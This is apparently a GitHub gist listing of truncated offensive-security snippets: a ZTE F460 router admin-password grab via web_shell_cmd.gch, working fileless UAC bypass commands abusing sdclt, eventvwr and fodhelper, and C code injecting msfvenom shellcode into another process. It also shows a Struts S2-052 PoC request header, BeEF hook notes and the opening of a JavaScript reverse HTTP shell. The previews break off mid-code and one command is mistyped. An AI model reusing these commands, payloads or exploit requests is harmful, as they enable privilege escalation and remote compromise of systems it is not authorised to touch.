Malayke

  • planet Earth (Solar System)
@Malayke
Malayke / ZTE F460 Router Jailbreak.md
Last active June 9, 2025 15:16
ZTE F460 China Telecom optical modem jailbreak method

The optical modem I was using before got water in it and burned out, so I picked up a ZTE F460 to use instead. There are countless methods online, but none of the ones I tried worked. China Telecom is really sneaky: as soon as you register the LOID they turn telnet off on you, and then nothing can be done. Today I spent a whole day tinkering and successfully obtained the telecomadmin password, and I can now TELNET into the router at any time.

Why jailbreak?

Without jailbreaking you only have ordinary user privileges: apart from the Wi-Fi password you can't change anything, the Wi-Fi name has to start with ChinaNet, and worst of all, China Telecom can remotely control the router at any time.

How to jailbreak?

The simplest method is to connect to the router by cable or Wi-Fi, open http://192.168.1.1/web_shell_cmd.gch, and then run the following command to obtain the super-user password

@Malayke
Malayke / .bat
Created November 25, 2018 04:49 — forked from initpwn/.bat
Fileless UAC Bypass
#sdclt fileless UAC bypass
regg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f
#eventvwr fileless UAC bypass
%windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe $executablepath = "Start-Process -FilePath 'cmd.exe'";$cmd = 'Start-Process -FilePath {0} -ArgumentList "/c reg add "HKCU\Software\Classes\mscfile\shell\open\command" /f /d "{0} /c %windir%\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -c \"IEX $executablepath;IEX $cmd) "' -f $env:comspec;
#fodhelper fileless UAC bypass
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd /c start powershell.exe" -Force;New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force;Start-Process "C:\Windows\System32\fodhelper.exe";Remove-Item "HKCU:\Software\Classes\ms-settings\
@Malayke
Malayke / release-android-debuggable.md
Created November 4, 2018 13:38 — forked from nstarke/release-android-debuggable.md
How to make a Release Android App debuggable

Let's say you want to access the application shared preferences in /data/data/com.mypackage.
You could try to run adb shell and then run-as com.mypackage (or adb shell run-as com.mypackage ls /data/data/com.mypackage/shared_prefs), but on a production release app downloaded from an app store you're most likely to see:

run-as: Package 'com.mypackage' is not debuggable
@Malayke
Malayke / NotCreateRemoteThread.c
Created September 9, 2018 15:10 — forked from securifybv/NotCreateRemoteThread.c
Run shell code in another process without CreateRemoteThread
#pragma comment(lib, "Shell32.lib")
#include <windows.h>
#include <shlobj.h>
// msfvenom -p windows/exec -a x86 --platform windows -f c cmd=calc.exe
int buf_len = 193;
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
@Malayke
Malayke / getMoreDomains.py
Created September 9, 2018 05:02 — forked from milo2012/getMoreDomains.py
Get Domains Belonging to Organization from securitytrails.com
import requests
import json
import pprint
import sys
import dns.message
import dns.query
import dns.rdatatype
import dns.resolver
import dns.reversename
import time
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads the C# project from a file or web URL
- Creates various tmp files
- Compiles with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Converts to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
@Malayke
Malayke / frida-enumerate-loaded-classes.py
Last active December 13, 2017 10:49
Use Frida to get the class names of a hardened (packed) APK
import frida, sys

# Print messages sent from the injected JavaScript back to Python
def on_message(message, data):
    if message['type'] == 'send':
        print("[*] {0}".format(message['payload']))
    else:
        print(message)

jscode = """
Java.perform(function() {
@Malayke
Malayke / gist:43f51f9073feff7a67f847e20da4072b
Created September 6, 2017 02:15
S2-052 CVE-2017-9805 POC
POST /struts2-rest-showcase/orders/3 HTTP/1.1
Host: localhost:8080
Content-Length: 1670
Cache-Control: max-age=0
Origin: http://localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Content-Type: application/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
DNT: 1
Most of the logic resides in https://github.com/beefproject/beef/tree/master/core/main/client
https://github.com/beefproject/beef/blob/master/core/main/client/beef.js establishes the beef object in the browser's DOM
window.onload then runs beef_init() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L24
Within beef_init() we run beef.net.browser_details() https://github.com/beefproject/beef/blob/master/core/main/client/init.js#L67
Within beef.net.browser_details() we gather the response from beef.browser.getDetails() https://github.com/beefproject/beef/blob/master/core/main/client/net.js#L503
@Malayke
Malayke / JSRat.ps1
Created March 11, 2016 04:47
Fileless JavaScript Reverse HTTP Shell
<#
Author: Casey Smith @subTee
License: BSD3-Clause
.SYNOPSIS
Simple Reverse Shell over HTTP. Execute Commands on Client.